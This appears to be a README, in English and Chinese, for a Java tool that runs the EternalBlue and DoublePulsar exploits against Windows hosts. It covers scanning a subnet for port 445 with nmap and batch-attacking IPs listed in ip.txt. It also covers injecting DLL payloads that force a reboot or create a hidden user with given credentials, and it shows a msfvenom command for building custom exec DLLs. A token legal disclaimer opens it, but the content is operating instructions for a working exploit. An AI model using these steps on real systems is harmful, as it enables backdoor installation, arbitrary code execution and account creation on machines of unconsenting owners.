Eternalblue Doublepulsar exploit
This program is only for testing security and you must comply with local laws. Otherwise, please immediately turn off and delete the program.
java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
ip.txt
192.168.0.3
此程序仅用于测试安全性,您必须遵守当地法律。 否则,请立即关闭并删除程序。
可借助nmap 扫描445端口开放的主机
nmap 192.168.0-255.0/24 -p 445 --open
start.bat打开即可。
或自己输入:
java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
pause
所有选项都有默认项,回车键即可。
注意顺序
Eternalble:安装backdoor
Doublepulsar:执行相关操作
两个exploit都有这个选项:
input TargetIpAddress or list (Default. The 'list' will use ip.txt):
在这一步除非输入IP地址,否则默认为批量利用:依次测试ip.txt中的ip
内容格式:一行一个ip
192.168.0.2
192.168.0.3
- dll跟目标机系统架构有关:x86用x86的dll文件,x64用x64的dll文件
- 文件夹dlls中自带了一些dll文件(附说明),程序默认Rundll的载荷为x64createSysUser.dll
- 在Dlls文件夹中放入自己的dll文件,如x.dll 在程序中输入x.dll即可
可使用msfvenom生成DLL(CMD可指定需要执行的命令):
Msfvenom –platform Windows -p windows/x64/exec -f dll -o /tmp/exec.dll CMD=calc
- X64reboot.dll X86reboot.dll
shutdown -r -f -t 00
立即重启计算机 :将显示窗口 标题为"您将要被注销" Windows将在一分钟内关闭。
- x64createSysUser.dll x86createSysUser.dll
创建用户(UAC机制导致仅能在管理员权限执行成功)
f4ck
f4ckworld